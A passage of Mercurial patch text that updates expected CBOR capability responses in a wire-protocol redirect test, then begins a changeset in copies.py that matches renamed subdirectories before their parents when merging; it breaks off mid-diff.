(?) s> POST /api/exp-http-v2-0003/ro/capabilities HTTP/1.1\r\n diff --git a/tests/test-wireproto-content-redirects.t b/tests/test-wireproto-content-redirects.t --- a/tests/test-wireproto-content-redirects.t +++ b/tests/test-wireproto-content-redirects.t @@ -66,9 +66,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2308\r\n + s> Content-Length: 2289\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-a is compatible) (tls1.2 !) (remote redirect target target-a requires unsupported TLS versions: 1.2, 1.3) (no-tls1.2 !) sending capabilities command @@ -396,9 +396,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2335\r\n + s> Content-Length: 2316\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-a is compatible) (remote redirect target target-b uses unsupported protocol: unknown) sending capabilities command @@ -731,9 +731,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2295\r\n + s> Content-Length: 2276\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (redirect target target-bad-tls requires SNI, which is unsupported) sending capabilities command s> setsockopt(6, 1, 1) -> None (?) @@ -1055,9 +1055,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2301\r\n + s> Content-Length: 2282\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-bad-tls requires unsupported TLS versions: 39, 42) sending capabilities command s> setsockopt(6, 1, 1) -> None (?) # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614902815 28800 # Thu Mar 04 16:06:55 2021 -0800 # Node ID ad30b29bc23de9533cc7367b5cdc6a925c96898d # Parent 7015b0232c5ea9666e621f7051a744d07a24f7b9 copies: choose target directory based on longest match If one side of a merge renames `dir1/` to `dir2/` and the subdirectory `dir1/subdir1/` to `dir2/subdir2/`, and the other side of the merge adds a file in `dir1/subdir1/`, we should clearly move that into `dir2/subdir2/`. We already detect the directories correctly before this patch, but we iterate over them in arbitrary order. That results in the new file sometimes ending up in `dir2/subdir1/` instead. This patch fixes it by iterating over the source directories by visiting subdirectories first. That's achieved by simply iterating over them in reverse lexicographical order. Without the fix, the test case still passes on Python 2 but fails on Python 3. It depends on the iteration order of the dict. I did not look into how it's built up and why it behaved differently before the fix. I could probably have gotten it to fail on Python 2 as well by choosing different directory names. Differential Revision: https://phab.mercurial-scm.org/D10115 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -1096,11 +1096,17 @@ b" discovered dir src: '%s' -> dst: '%s'\n" % (d, dirmove[d]) ) + # Sort the directories in reverse order, so we find children first + # For example, if dir1/ was renamed to dir2/, and dir1/subdir1/ + # was renamed to dir2/subdir2/, we want to move dir1/subdir1/file + # to dir2/subdir2/file (not dir2/subdir1/file) + dirmove_children_first = sorted(dirmove, reverse=True) + movewithdir = {} # check 